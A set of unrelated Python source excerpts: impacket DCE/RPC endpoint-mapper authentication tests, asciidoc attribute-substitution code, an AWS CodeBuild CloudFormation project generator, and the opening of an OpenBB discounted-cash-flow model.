request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_Aes128KerberosPacketPrivacy(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey128,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE, auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_Aes256KerberosPacketPrivacy(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey256,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE, auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_AnonWINNTPacketPrivacy(self):
# With SMB Transport this will fail with STATUS_ACCESS_DENIED
try:
dce = self.connectDCE('', '', '', auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,dceAuth=False, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
except Exception, e:
if not (str(e).find('STATUS_ACCESS_DENIED') >=0 and self.stringBinding.find('ncacn_np') >=0):
raise
class TCPTransport(DCERPCTests):
def setUp(self):
DCERPCTests.setUp(self)
# Put specific configuration for target machine with SMB1
configFile = ConfigParser.ConfigParser()
configFile.read('dcetests.cfg')
self.username = configFile.get('TCPTransport', 'username')
self.domain = configFile.get('TCPTransport', 'domain')
self.serverName = configFile.get('TCPTransport', 'servername')
self.password = configFile.get('TCPTransport', 'password')
self.machine = configFile.get('TCPTransport', 'machine')
self.hashes = configFile.get('TCPTransport', 'hashes')
self.aesKey256= configFile.get('TCPTransport', 'aesKey256')
self.aesKey128= configFile.get('TCPTransport', 'aesKey128')
self.stringBinding = r'ncacn_ip_tcp:%s' % self.machine
class SMBTransport(DCERPCTests):
def setUp(self):
# Put specific configuration for target machine with SMB_002
DCERPCTests.setUp(self)
configFile = ConfigParser.ConfigParser()
configFile.read('dcetests.cfg')
self.username = configFile.get('SMBTransport', 'username')
self.domain = configFile.get('SMBTransport', 'domain')
self.serverName = configFile.get('SMBTransport', 'servername')
self.password = configFile.get('SMBTransport', 'password')
self.machine = configFile.get('SMBTransport', 'machine')
self.hashes = configFile.get('SMBTransport', 'hashes')
self.aesKey256= configFile.get('SMBTransport', 'aesKey256')
self.aesKey128= configFile.get('SMBTransport', 'aesKey128')
self.stringBinding = r'ncacn_np:%s[\pipe\epmapper]' % self.machine
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
testcase = sys.argv[1]
suite = unittest.TestLoader().loadTestsFromTestCase(globals()[testcase])
| |
None:
attrs = document.attributes
else:
# Remove numbered document attributes so they don't clash with
# attribute list positional attributes.
attrs = {}
for k,v in document.attributes.items():
if not re.match(r'^\d+$', k):
attrs[k] = v
# Substitute attribute references inside dictionary values.
for k,v in dictionary.items():
if v is None:
del dictionary[k]
else:
v = subs_attrs(str(v))
if v is None:
del dictionary[k]
else:
dictionary[k] = v
attrs.update(dictionary)
# Substitute all attributes in all lines.
result = []
for line in lines:
# Make it easier for regular expressions.
line = line.replace('\\{','{\\')
line = line.replace('\\}','}\\')
# Expand simple attributes ({name}).
# Nested attributes not allowed.
reo = re.compile(r'(?su)\{(?P<name>[^\\\W][-\w]*?)\}(?!\\)')
pos = 0
while True:
mo = reo.search(line,pos)
if not mo: break
s = attrs.get(mo.group('name'))
if s is None:
pos = mo.end()
else:
s = str(s)
line = line[:mo.start()] + s + line[mo.end():]
pos = mo.start() + len(s)
# Expand conditional attributes.
# Single name -- higher precedence.
reo1 = re.compile(r'(?su)\{(?P<name>[^\\\W][-\w]*?)' \
r'(?P<op>\=|\?|!|#|%|@|\$)' \
r'(?P<value>.*?)\}(?!\\)')
# Multiple names (n1,n2,... or n1+n2+...) -- lower precedence.
reo2 = re.compile(r'(?su)\{(?P<name>[^\\\W][-\w'+OR+AND+r']*?)' \
r'(?P<op>\=|\?|!|#|%|@|\$)' \
r'(?P<value>.*?)\}(?!\\)')
for reo in [reo1,reo2]:
pos = 0
while True:
mo = reo.search(line,pos)
if not mo: break
attr = mo.group()
name = mo.group('name')
if reo == reo2:
if OR in name:
sep = OR
else:
sep = AND
names = [s.strip() for s in name.split(sep) if s.strip() ]
for n in names:
if not re.match(r'^[^\\\W][-\w]*$',n):
message.error('illegal attribute syntax: %s' % attr)
if sep == OR:
# Process OR name expression: n1,n2,...
for n in names:
if attrs.get(n) is not None:
lval = ''
break
else:
lval = None
else:
# Process AND name expression: n1+n2+...
for n in names:
if attrs.get(n) is None:
lval = None
break
else:
lval = ''
else:
lval = attrs.get(name)
op = mo.group('op')
# mo.end() not good enough because '{x={y}}' matches '{x={y}'.
end = end_brace(line,mo.start())
rval = line[mo.start('value'):end-1]
UNDEFINED = '{zzzzz}'
if lval is None:
if op == '=': s = rval
elif op == '?': s = ''
elif op == '!': s = rval
elif op == '#': s = UNDEFINED # So the line is dropped.
elif op == '%': s = rval
elif op in ('@','$'):
s = UNDEFINED # So the line is dropped.
else:
assert False, 'illegal attribute: %s' % attr
else:
if op == '=': s = lval
elif op == '?': s = rval
elif op == '!': s = ''
elif op == '#': s = rval
elif op == '%': s = UNDEFINED # So the line is dropped.
elif op in ('@','$'):
v = re.split(r'(?<!\\):',rval)
if len(v) not in (2,3):
message.error('illegal attribute syntax: %s' % attr)
s = ''
elif not is_re('^'+v[0]+'$'):
message.error('illegal attribute regexp: %s' % attr)
s = ''
else:
v = [s.replace('\\:',':') for s in v]
re_mo = re.match('^'+v[0]+'$',lval)
if op == '@':
if re_mo:
s = v[1] # {<name>@<re>:<v1>[:<v2>]}
else:
if len(v) == 3: # {<name>@<re>:<v1>:<v2>}
s = v[2]
else: # {<name>@<re>:<v1>}
s = ''
else:
if re_mo:
if len(v) == 2: # {<name>$<re>:<v1>}
s = v[1]
elif v[1] == '': # {<name>$<re>::<v2>}
s = UNDEFINED # So the line is dropped.
else: # {<name>$<re>:<v1>:<v2>}
s = v[1]
else:
if len(v) == 2: # {<name>$<re>:<v1>}
s = UNDEFINED # So the line is dropped.
else: # {<name>$<re>:<v1>:<v2>}
s = v[2]
else:
assert False, 'illegal attribute: %s' % attr
s = str(s)
line = line[:mo.start()] + s + line[end:]
pos = mo.start() + len(s)
# Drop line if it contains unsubstituted {name} references.
skipped = re.search(r'(?su)\{[^\\\W][-\w]*?\}(?!\\)', line)
if skipped:
trace('dropped line', line)
continue;
# Expand system attributes (eval has precedence).
reos = [
re.compile(r'(?su)\{(?P<action>eval):(?P<expr>.*?)\}(?!\\)'),
re.compile(r'(?su)\{(?P<action>[^\\\W][-\w]*?):(?P<expr>.*?)\}(?!\\)'),
]
skipped = False
for reo in reos:
pos = 0
while True:
mo = reo.search(line,pos)
if not mo: break
expr = mo.group('expr')
action = mo.group('action')
expr = expr.replace('{\\','{')
expr = expr.replace('}\\','}')
s = system(action, expr, attrs=dictionary)
if dictionary is not None and action in ('counter','counter2','set','set2'):
# These actions create and update attributes.
attrs.update(dictionary)
if s is None:
# Drop line if the action returns None.
skipped = True
break
line = line[:mo.start()] + s + line[mo.end():]
pos = mo.start() + len(s)
if skipped:
break
if not skipped:
# Remove backslash from escaped entries.
line = line.replace('{\\','{')
line = line.replace('}\\','}')
result.append(line)
if string_result:
if result:
return '\n'.join(result)
else:
return None
else:
return tuple(result)
def char_encoding():
encoding = document.attributes.get('encoding')
if encoding:
try:
codecs.lookup(encoding)
except LookupError,e:
raise EAsciiDoc,str(e)
return encoding
def char_len(s):
return len(char_decode(s))
east_asian_widths = {'W': 2, # Wide
'F': 2, # Full-width (wide)
'Na': 1, # Narrow
'H': 1, # Half-width (narrow)
'N': 1, # Neutral (not East Asian, treated as narrow)
'A': 1} # Ambiguous (s/b wide in East Asian context,
# narrow otherwise, but that doesn't work)
"""Mapping of result codes from `unicodedata.east_asian_width()` to character
column widths."""
def column_width(s):
text = char_decode(s)
if isinstance(text, unicode):
width = 0
for c in text:
width += east_asian_widths[unicodedata.east_asian_width(c)]
return width
else:
return len(text)
def char_decode(s):
if char_encoding():
try:
return s.decode(char_encoding())
except Exception:
raise EAsciiDoc, \
"'%s' codec can't decode \"%s\"" % (char_encoding(), s)
else:
return s
def char_encode(s):
if char_encoding():
return s.encode(char_encoding())
else:
return s
def time_str(t):
"""Convert seconds since the Epoch to formatted local time string."""
t = time.localtime(t)
s = time.strftime('%H:%M:%S',t)
if time.daylight and t.tm_isdst == 1:
result = s + ' ' + time.tzname[1]
else:
result = s + ' ' + time.tzname[0]
# Attempt to convert the localtime to the output encoding.
try:
result = char_encode(result.decode(locale.getdefaultlocale()[1]))
except Exception:
pass
return result
def date_str(t):
"""Convert seconds since the Epoch to formatted local date string."""
t = time.localtime(t)
return time.strftime('%Y-%m-%d',t)
class Lex:
"""Lexical analysis routines. Static methods and attributes only."""
prev_element = None
prev_cursor = None
def __init__(self):
raise AssertionError,'no class instances allowed'
@staticmethod
def next():
"""Returns class of next element on the input (None if EOF). The
reader is assumed to be at the first line following a previous element,
end of file or line one. Exits with the reader pointing to the first
line of the next element or EOF (leading blank lines are skipped)."""
reader.skip_blank_lines()
if reader.eof(): return None
# Optimization: If we've already checked for an element at this
# position return the element.
if Lex.prev_element and Lex.prev_cursor == reader.cursor:
return Lex.prev_element
if AttributeEntry.isnext():
result = AttributeEntry
elif AttributeList.isnext():
result = AttributeList
elif BlockTitle.isnext() and not tables_OLD.isnext():
result = BlockTitle
elif Title.isnext():
if AttributeList.style() == 'float':
result = FloatingTitle
else:
result = Title
elif macros.isnext():
result = macros.current
elif lists.isnext():
result = lists.current
elif blocks.isnext():
result = blocks.current
elif tables_OLD.isnext():
result = tables_OLD.current
elif tables.isnext():
result = tables.current
else:
if not paragraphs.isnext():
raise EAsciiDoc,'paragraph expected'
result = paragraphs.current
# Optimization: Cache answer.
Lex.prev_cursor = reader.cursor
Lex.prev_element = result
return result
@staticmethod
def canonical_subs(options):
"""Translate composite subs values."""
if len(options) == 1:
if options[0] == 'none':
options = ()
elif options[0] == 'normal':
options = config.subsnormal
elif options[0] == 'verbatim':
options = config.subsverbatim
return options
@staticmethod
def subs_1(s,options):
"""Perform substitution specified in 'options' (in 'options' order)."""
if not s:
return s
if document.attributes.get('plaintext') is not None:
options = ('specialcharacters',)
result = s
options = Lex.canonical_subs(options)
for o in options:
if o == 'specialcharacters':
result = config.subs_specialchars(result)
elif o == 'attributes':
result = subs_attrs(result)
elif o == 'quotes':
result = subs_quotes(result)
elif o == 'specialwords':
result = config.subs_specialwords(result)
elif o in ('replacements','replacements2','replacements3'):
result = config.subs_replacements(result,o)
elif o == 'macros':
result = macros.subs(result)
elif o == 'callouts':
result = macros.subs(result,callouts=True)
else:
raise EAsciiDoc,'illegal substitution option: %s' % o
trace(o, s, result)
if not result:
break
return result
@staticmethod
def subs(lines,options):
"""Perform inline processing specified by 'options' (in 'options'
order) on sequence of 'lines'."""
if not lines or not options:
return lines
options = Lex.canonical_subs(options)
# Join lines so quoting can span multiple lines.
para = '\n'.join(lines)
if 'macros' in options:
para = macros.extract_passthroughs(para)
for o in options:
if o | |
<filename>codebuild/create_project.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
copywrite = """# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use
# this file except in compliance with the License. A copy of the License is
# located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing permissions and
# limitations under the License.
"""
import argparse
import boto3
import configparser
import hashlib
import json
import logging
import os
import sys
import time
from awacs.aws import Action, Allow, Statement, Principal, PolicyDocument
from awacs.sts import AssumeRole
from botocore import exceptions
from troposphere import GetAtt, Template, Ref, Output
from troposphere.events import Rule, Target
from troposphere.iam import Role, Policy
from troposphere.codebuild import Artifacts, Environment, Source, Project
logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def build_cw_event(template=Template, project_name=None, role=None, target_job=None, hour=12, input_json=None):
""" Create a CloudWatch Event to run a CodeBuild Project. """
# CloudFormation doesn't allow underscores
project_name = project_name.replace('_', '')
# target_job is only expected in the case where multiple events are pointed at the same target.
# Use the project name as the dependency otherwise.
if not target_job:
target_job = project_name
# input_json is used to pass additional ENV variables to the codebuild job.
if input_json:
project_target = Target(
f"{project_name}Target",
Arn=GetAtt(target_job, "Arn"),
RoleArn=GetAtt(role, "Arn"),
Input=json.dumps(input_json),
Id=f"{project_name}CWid"
)
else:
project_target = Target(
f"{project_name}Target",
Arn=GetAtt(target_job, "Arn"),
RoleArn=GetAtt(role, "Arn"),
Id=f"{project_name}CWid"
)
Rule(f"{project_name}Rule",
template=template,
Name=f"{project_name}Evernt",
Description="scheduled run Build with CloudFormation",
Targets=[project_target],
State='ENABLED',
# Run at the top of hour.
ScheduleExpression=f"cron(0 {hour} * * ? *)",
DependsOn=target_job
)
def build_cw_cb_role(template, config, role_name="s2nEventsInvokeCodeBuildRole"):
"""
Create a role for CloudWatch events to trigger scheduled CodeBuild jobs.
"""
role_id = template.add_resource(
Role(
role_name,
Path='/',
AssumeRolePolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Action=[Action("sts", "AssumeRole"),
],
Principal=Principal("Service", ["events.amazonaws.com"])
)
]
),
Policies=[Policy(
PolicyName=f"EventsInvokeCBRole",
PolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Action=[Action("codebuild", "StartBuild")],
Resource=[
"arn:aws:codebuild:{region}:{account_number}:project/*".format(
region=config.get('Global', 'aws_region'),
account_number=config.get('CFNRole', 'account_number')),
]
)
]
)
)
]
)
)
return role_id
def build_github_role(template, config, role_name="s2nCodeBuildGithubRole"):
"""
Create a role for GitHub actions to use for launching CodeBuild jobs.
This is not attached to any other resource created in this file.
"""
template.add_resource(
Role(
role_name,
Path='/',
AssumeRolePolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Principal=Principal("Service", ["codebuild.amazonaws.com"]),
Action=[Action("sts", "AssumeRole")],
)
]
),
)
)
def build_artifacts(identifier: str, s3_bucketname: str) -> Artifacts:
""" CodeBuild Artifact and Secondary Artifact creation. """
artifact = Artifacts(
Name=f"{identifier}Artifact",
ArtifactIdentifier=identifier,
EncryptionDisabled=True,
Location=s3_bucketname,
NamespaceType='NONE', # NOTE: case sensitive
OverrideArtifactName=False,
Packaging='ZIP', # NOTE: case sensitive
Type='S3') # NOTE: case sensitive
return artifact
def build_project(template=Template(), section=None, project_name=None, raw_env=None,
service_role: str = None) -> Template:
""" Assemble all the requirements for a Troposphere CodeBuild Project. """
template.set_version('2010-09-09')
secondary_artifacts = list()
# Artifact object creation
if 'artifact_s3_bucket' in config[section]:
artifacts = build_artifacts(project_name,
config.get(section, 'artifact_s3_bucket'))
if 'artifact_secondary_identifiers' in config[section]:
# There can be N number of secondary artifacts
for arti in config.get(section, 'artifact_secondary_identifiers').split(','):
secondary_artifacts.append(build_artifacts(arti, config.get(section, 'artifact_s3_bucket')))
else:
# One blank Artifact object required.
artifacts = Artifacts(Type='NO_ARTIFACTS')
env_list = list()
# Convert the env: line in the config to a list.
try:
logging.debug(f'raw_env is {raw_env}')
env = raw_env.split(' ')
except AttributeError:
env = config.get(section, 'env').split(' ')
logging.debug(f'Section is {section}')
# Split the env key/value pairs into dict.
for i in env:
k, v = i.split("=")
env_list.append({"Name": k, "Value": v})
environment = Environment(
ComputeType=config.get(section, 'compute_type'),
Image=str(config.get(section, 'image')),
Type=str(config.get(section, 'env_type')),
PrivilegedMode=True,
EnvironmentVariables=env_list,
)
source = Source(
Location=config.get(section, 'source_location'),
Type=config.get(section, 'source_type'),
GitCloneDepth=config.get(section, 'source_clonedepth'),
BuildSpec=config.get(section, 'buildspec'),
ReportBuildStatus=True
)
# Artifact is required; SecondaryArtifact is optional.
if secondary_artifacts:
project = Project(
project_name,
Artifacts=artifacts,
SecondaryArtifacts=secondary_artifacts,
Environment=environment,
Name=project_name,
TimeoutInMinutes=config.get(section, 'timeout_in_min'),
ServiceRole=Ref(service_role),
Source=source,
SourceVersion=config.get(section, 'source_version'),
BadgeEnabled=True,
DependsOn=service_role,
)
else:
project = Project(
project_name,
Artifacts=artifacts,
Environment=environment,
Name=project_name,
TimeoutInMinutes=config.get(section, 'timeout_in_min'),
ServiceRole=Ref(service_role),
Source=source,
SourceVersion=config.get(section, 'source_version'),
BadgeEnabled=True,
DependsOn=service_role,
)
template.add_resource(project)
template.add_output([Output(f"CodeBuildProject{project_name}", Value=Ref(project))])
def build_codebuild_role(config, template=Template(), project_name: str = None, **kwargs) -> Ref:
""" Build a role with a CodeBuild managed policy. """
assert project_name
role_name = project_name + 'Role'
region = config.get("Global", "aws_region")
account_number = config.get("CFNRole", "account_number")
# Create a policy to Allow CodeBuild to write to s3 for Artifact storage/retrieval.
# This should be an AWS Managed Policy, but here we are.
policies = [Policy(
PolicyName=f"CodeBuildArtifactPolicy",
PolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Action=[Action("s3", "PutObject"),
Action("s3", "GetObject"),
Action("s3", "GetObjectVersion"),
Action("s3", "GetBucketAcl"),
Action("s3", "GetBucketLocation")],
Resource=[
"arn:aws:s3:::s2n-build-artifacts/*",
]
),
Statement(
Effect=Allow,
Action=[Action("logs", "CreateLogGroup"),
Action("logs", "CreateLogStream"),
Action("logs", "PutLogEvents")],
Resource=[
"arn:aws:logs:{region}:{account_number}:log-group:/aws/codebuild/{project}:*".format(
region=region, account_number=account_number, project=project_name),
]
),
Statement(
Effect=Allow,
Action=[
Action("codecommit", "BatchGet*"),
Action("codecommit", "BatchDescribe*"),
Action("codecommit", "Describe*"),
Action("codecommit", "EvaluatePullRequestApprovalRules"),
Action("codecommit", "Get*"),
Action("codecommit", "List*"),
Action("codecommit", "GitPull"),
],
Resource=["*"],
),
]
)
)]
# NOTE: By default CodeBuild manages the policies for this role. If you delete a CFN stack and try to recreate the
# project or make changes to it when the Codebuild managed Policy still exists, you'll see an error in the UI:
# `The policy is attached to 0 entities but it must be attached to a single role`. (CFN fails with fail to update)
# Orphaned policies created by CodeBuild will have CodeBuildBasePolicy prepended to them; search for policies with
# this name and no role and delete to clear the error.
role_id = template.add_resource(
Role(
role_name,
Path='/',
Description='Policy created by CloudFormation.',
Policies=policies,
AssumeRolePolicyDocument=PolicyDocument(
Statement=[
Statement(
Effect=Allow,
Action=[AssumeRole],
Principal=Principal("Service", ["codebuild.amazonaws.com"])
)
]
)
)
)
template.add_output([Output(role_name, Value=Ref(role_id))])
return Ref(role_id)
def display_change_set(description):
"""Not the greatest display, but this doesn't require any additional dependencies."""
for change in description['Changes']:
items = []
for k, v in change['ResourceChange'].items():
if type(v) is list:
v = str(v)
q = f"\n\t{k:<20} {v:>10}"
items.append(q)
logging.info("Summary of changes: {}".format("".join(items)))
def modify_existing_stack(client, config, codebuild):
"""Modify and exist Codebuild project's CloudFormation stack"""
stack_name = config.get("Global", "stack_name")
# ChangeSetNames are required to start with an Alphabetic character, and to be unique.
# Prefixing the hashed timed with an 'A' gets it done.
change_set_name = "A" + hashlib.sha256(bytes(time.asctime().encode('utf-8'))).hexdigest()
client.create_change_set(
StackName=stack_name,
TemplateBody=codebuild.to_yaml(),
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=change_set_name)
logging.info(f"Waiting for change set {change_set_name}")
waiter = client.get_waiter('change_set_create_complete')
waiter.wait(StackName=stack_name, ChangeSetName=change_set_name, WaiterConfig={"Delay": 3, "MaxAttempt": 3})
description = client.describe_change_set(StackName=stack_name, ChangeSetName=change_set_name)
display_change_set(description)
key = input('\nDo these changes make sense? [Y/n]')
if key != "Y":
logging.info("Exiting without executing change set")
client.delete_change_set(StackName=stack_name, ChangeSetName=change_set_name)
return
logging.info(f"Executing {change_set_name}")
exc = client.execute_change_set(
StackName=stack_name,
ChangeSetName=change_set_name)
waiter = client.get_waiter('stack_update_complete')
waiter.wait(StackName=stack_name, WaiterConfig={"Delay": 5, "MaxAttempt": 6})
logging.info(f"Update completed: {exc}")
def create_new_stack(client, config, codebuild):
"""Create a new CloudFormation stack for the Codebuild project"""
try:
result = client.create_stack(
StackName=config.get("Global", "stack_name"),
TemplateBody=codebuild.to_yaml(),
Capabilities=["CAPABILITY_IAM"])
logging.info("Creating stack {}".format(result['StackId']))
except client.exceptions.AlreadyExistsException as e:
logging.error("Stack already exists, you must use the --modify-existing flag to update a stack")
def validate_cfn(boto_client: boto3.client, cfn_template: str):
""" Call validate_template with boto. """
try:
response = boto_client.validate_template(TemplateBody=cfn_template)
logging.debug(f"CloudFormation Template validation response: {response}")
logging.info('CloudFormation template validation complete.')
except exceptions.ClientError as e:
raise SystemExit(f"Failed: {e}")
def main(args, config):
""" Create the CFN template and do stuff with said template. """
codebuild = Template()
codebuild.set_version('2010-09-09')
# Create a single CloudWatch Event role to allow codebuild:startBuild
cw_event_role = build_cw_cb_role(codebuild, config)
temp_yaml_filename = args.output_dir + "/s2n_codebuild_projects.yml"
# Role used by GitHub Actions.
if config.has_option('Global', 'create_github_role') and config.getboolean('Global', 'create_github_role'):
build_github_role(codebuild, config)
# Walk the config file, adding each stanza to the Troposphere template.
for job in config.sections():
if ':' in job:
job_title = job.split(':')[1]
if 'CodeBuild:' in job:
service_role = build_codebuild_role(config,template=codebuild, project_name=job_title).to_dict()
# Pull the env out of the section, and use the snippet for the other values.
# Note: only env is over-ridden with snippets.
if 'snippet' in config[job]:
build_project(template=codebuild, project_name=job_title, section=config.get(job, 'snippet'),
service_role=service_role['Ref'], raw_env=config.get(job, 'env'))
else:
build_project(template=codebuild, project_name=job_title, section=job, service_role=service_role['Ref'])
# Scheduled runs triggered by CloudWatch.
build_cw_event(template=codebuild, project_name=job_title, role=cw_event_role)
if 'CloudWatchEvent' in job:
# CloudWatch input allows us to over-ride environment variables passed to codebuild.
cw_input = json.loads(config.get(job, 'input'))
# Note that for Cloudwatch, we're need to reference an existing CodeBuild Job.
build_cw_event(template=codebuild, project_name=job_title, target_job=config.get(job, 'build_job_name'),
role=cw_event_role,
hour=config.get(job, 'start_time'), input_json=cw_input)
# Write out a CloudFormation template. This is ephemeral and is not used again.
with(open(temp_yaml_filename, 'w')) as fh:
fh.write(codebuild.to_yaml())
logging.info(f"Wrote cfn yaml file to {temp_yaml_filename}")
if args.noop:
logging.info("Respecting noop, Done.")
return
else:
# Fire up the boto, exit gracefully if the user doesn't have creds setup.
client = boto3.client('cloudformation', region_name=config.get('Global', 'aws_region'))
try:
validate_cfn(client, codebuild.to_yaml())
except exceptions.NoCredentialsError:
raise SystemExit(f"Something went wrong with your AWS credentials; Exiting.")
| |
<reponame>JerBouma/OpenBBTerminal
""" DCF Model """
__docformat__ = "numpy"
import logging
import os
from io import BytesIO
from pathlib import Path
from typing import Any, Dict, List, Tuple, Union
from urllib.request import urlopen
from zipfile import ZipFile
import financedatabase as fd
import pandas as pd
import requests
import yfinance as yf
from bs4 import BeautifulSoup
from openpyxl import worksheet
from sklearn.linear_model import LinearRegression
from openbb_terminal.decorators import log_start_end
from openbb_terminal.stocks.fundamental_analysis import dcf_static
from openbb_terminal.helper_funcs import compose_export_path
logger = logging.getLogger(__name__)
CURRENCIES = [
"ALL",
"AFN",
"ARS",
"AWG",
"AUD",
"AZN",
"BSD",
"BBD",
"BYN",
"BZD",
"BMD",
"BOB",
"BAM",
"BWP",
"BGN",
"BRL",
"BND",
"KHR",
"CAD",
"KYD",
"CLP",
"CNY",
"COP",
"CRC",
"HRK",
"CUP",
"CZK",
"DKK",
"DOP",
"XCD",
"EGP",
"SVC",
"EUR",
"FKP",
"FJD",
"GHS",
"GIP",
"GTQ",
"GGP",
"GYD",
"HNL",
"HKD",
"HUF",
"ISK",
"INR",
"IDR",
"IRR",
"IMP",
"ILS",
"JMD",
"JPY",
"JEP",
"KZT",
"KPW",
"KRW",
"KGS",
"LAK",
"LBP",
"LRD",
"MKD",
"MYR",
"MUR",
"MXN",
"MNT",
"MNT",
"MZN",
"NAD",
"NPR",
"ANG",
"NZD",
"NIO",
"NGN",
"NOK",
"OMR",
"PKR",
"PAB",
"PYG",
"PEN",
"PHP",
"PLN",
"QAR",
"RON",
"RUB",
"SHP",
"SAR",
"RSD",
"SCR",
"SGD",
"SBD",
"SOS",
"KRW",
"ZAR",
"LKR",
"SEK",
"CHF",
"SRD",
"SYP",
"TWD",
"THB",
"TTD",
"TRY",
"TVD",
"UAH",
"AED",
"GBP",
"USD",
"UYU",
"UZS",
"VEF",
"VND",
"YER",
"ZWD",
]
@log_start_end(log=logger)
def string_float(string: str) -> float:
"""Convert a string to a float
Parameters
----------
string : str
String to be converted
Returns
-------
number : float
Analysis of filings text
"""
if string.strip().replace(",", "").replace("-", "") == "":
return 0
return float(string.strip().replace(",", "").replace("-", ""))
def insert_row(
name: str, index: str, df: pd.DataFrame, row_v: List[str]
) -> pd.DataFrame:
"""Allows a row to be added given an index and name
Parameters
----------
name : str
Name to be added to df
index : str
The row the new item will go after
df : pd.DataFrame
The dataframe to be modified
row_v : List[str]
The items to be added to the row
Returns
-------
new_df : pd.DataFrame
The new dataframe
"""
pd.options.mode.chained_assignment = None
if name not in df.index:
row_number = df.index.get_loc(index) + 1
df1 = df[0:row_number]
df2 = df[row_number:]
df1.loc[name] = row_v
df_result = pd.concat([df1, df2])
return df_result
return df
@log_start_end(log=logger)
def set_cell(
ws: worksheet,
cell: str,
text: Union[int, str, float] = None,
font: str = None,
border: str = None,
fill: str = None,
alignment: str = None,
num_form: str = None,
):
"""Set the value for a cell
Parameters
----------
ws : worksheet
The worksheet to be modified
cell : str
The cell that will be modified
text : Union[int, str, float]
The new value of the cell
font : str
The type of font
border : str
The type of border
fill : str
The type of fill
alignment : str
The type of alignment
num_form : str
The format for numbers
"""
if text:
ws[cell] = text
if font:
ws[cell].font = font
if border:
ws[cell].border = border
if fill:
ws[cell].fill = fill
if alignment:
ws[cell].alignment = alignment
if num_form:
ws[cell].number_format = num_form
@log_start_end(log=logger)
def get_fama_raw() -> pd.DataFrame:
"""Get Fama French data
Returns
-------
df : pd.DataFrame
Fama French data
"""
with urlopen( # nosec
"https://mba.tuck.dartmouth.edu/pages/faculty/ken.french/ftp/F-F_Research_Data_Factors_CSV.zip"
) as url:
# Download Zipfile and create pandas DataFrame
with ZipFile(BytesIO(url.read())) as zipfile:
with zipfile.open("F-F_Research_Data_Factors.CSV") as zip_open:
df = pd.read_csv(
zip_open,
header=0,
names=["Date", "MKT-RF", "SMB", "HML", "RF"],
skiprows=3,
)
df = df[df["Date"].apply(lambda x: len(str(x).strip()) == 6)]
df["Date"] = df["Date"].astype(str) + "01"
df["Date"] = pd.to_datetime(df["Date"], format="%Y%m%d")
df["MKT-RF"] = pd.to_numeric(df["MKT-RF"], downcast="float")
df["SMB"] = pd.to_numeric(df["SMB"], downcast="float")
df["HML"] = pd.to_numeric(df["HML"], downcast="float")
df["RF"] = pd.to_numeric(df["RF"], downcast="float")
df["MKT-RF"] = df["MKT-RF"] / 100
df["SMB"] = df["SMB"] / 100
df["HML"] = df["HML"] / 100
df["RF"] = df["RF"] / 100
df = df.set_index("Date")
return df
@log_start_end(log=logger)
def get_historical_5(ticker: str) -> pd.DataFrame:
"""Get 5 year monthly historical performance for a ticker with dividends filtered
Parameters
----------
ticker : str
The ticker to be analyzed
Returns
-------
df : pd.DataFrame
Historical data
"""
tick = yf.Ticker(ticker)
df = tick.history(period="5y", interval="1mo")
df = df[df.index.to_series().apply(lambda x: x.day == 1)]
df = df.drop(["Dividends", "Stock Splits"], axis=1)
df = df.dropna()
return df
@log_start_end(log=logger)
def get_fama_coe(ticker: str) -> float:
"""Use Fama and French to get the cost of equity for a company
Parameters
----------
ticker : str
The ticker to be analyzed
Returns
-------
coef : float
The stock's Fama French coefficient
"""
df_f = get_fama_raw()
df_h = get_historical_5(ticker)
df = df_h.join(df_f)
df = df.dropna()
df["Monthly Return"] = df["Close"].pct_change()
df["Excess Monthly Return"] = df["Monthly Return"] - df["RF"]
df = df.dropna()
x = df[["MKT-RF", "SMB", "HML"]]
y = df["Excess Monthly Return"]
model = LinearRegression().fit(x, y)
coefs = model.coef_
return (
df["RF"].mean()
+ coefs[0] * df["MKT-RF"].mean()
+ coefs[1] * df["SMB"].mean()
+ coefs[2] * df["HML"].mean()
) * 12
@log_start_end(log=logger)
def others_in_sector(
ticker: str, sector: str, industry: str, no_filter: bool = False
) -> List[str]:
"""Get other stocks in a ticker's sector
Parameters
----------
ticker : str
The ticker to be excluded
sector : str
The sector to pull from
industry : str
The industry to pull from
no_filter : bool
True means that we do not filter based on market cap
Returns
-------
tickers : List[str]
List of tickers in the same sector
"""
industry = industry.replace("—", " - ")
industry = industry.replace("/", " ")
similars = fd.select_equities(sector=sector, industry=industry)
# This filters similars to match market cap and removes ticker analyzed
